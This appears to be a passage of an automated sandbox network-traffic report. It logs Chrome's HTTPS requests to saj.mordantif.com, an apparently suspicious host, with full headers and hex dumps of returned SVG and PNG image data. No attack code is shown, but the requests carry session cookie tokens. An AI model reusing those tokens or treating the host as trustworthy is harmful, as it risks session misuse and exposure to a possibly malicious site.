                                                        Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 2e 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30
                                                        Data Ascii: .9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.600
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35
                                                        Data Ascii: C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.695
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 32 34 4c 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30
                                                        Data Ascii: 24L28.1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.50
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 2e 37 34 30 38 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33
                                                        Data Ascii: .7408 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3
                                                        2024-09-13 13:07:11 UTC1214INData Raw: 20 34 38 2e 32 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31
                                                        Data Ascii: 48.2977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 1
                                                        2024-09-13 13:07:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.549828104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:10 UTC1132OUTGET /wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:11 UTC667INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:11 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g7A%2FhI7ckIMgD5TsEp0in6FxsUkZF9x7btD5LxE1mZkNeGf6F03PJEbaIoAHVk3TU79yToyIXFodzWwclSLgUgzUWCYTXipj26vzGJ5u8YlQLSHNr7niwSQOqhwnAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bd7280672bc-EWR
                                                        2024-09-13 13:07:11 UTC702INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                        Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c
                                                        Data Ascii: 22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,
                                                        2024-09-13 13:07:11 UTC841INData Raw: 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34
                                                        Data Ascii: l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.64
                                                        2024-09-13 13:07:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.549833172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:11 UTC1469OUTGET /ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:11 UTC664INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:11 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 49602
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PujYfgCZXkWAqrHSJARjv%2BOsPkJzLFKN%2Fy9O46CyTphtbGX25e5yrsifyLsSORWsgvSVW5RveVtLOicZaIeZFWE8pjtqpkM26DaNddJ70IEhd2chKndstsDasiU4mQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bda6fd780dc-EWR
                                                        2024-09-13 13:07:11 UTC705INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                        Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db
                                                        Data Ascii: p=n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30
                                                        Data Ascii: IgPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p0
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81
                                                        Data Ascii: \@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0
                                                        2024-09-13 13:07:11 UTC1369INData Raw: cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42
                                                        Data Ascii: (Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tB
                                                        2024-09-13 13:07:11 UTC1369INData Raw: f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f
                                                        Data Ascii: \uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 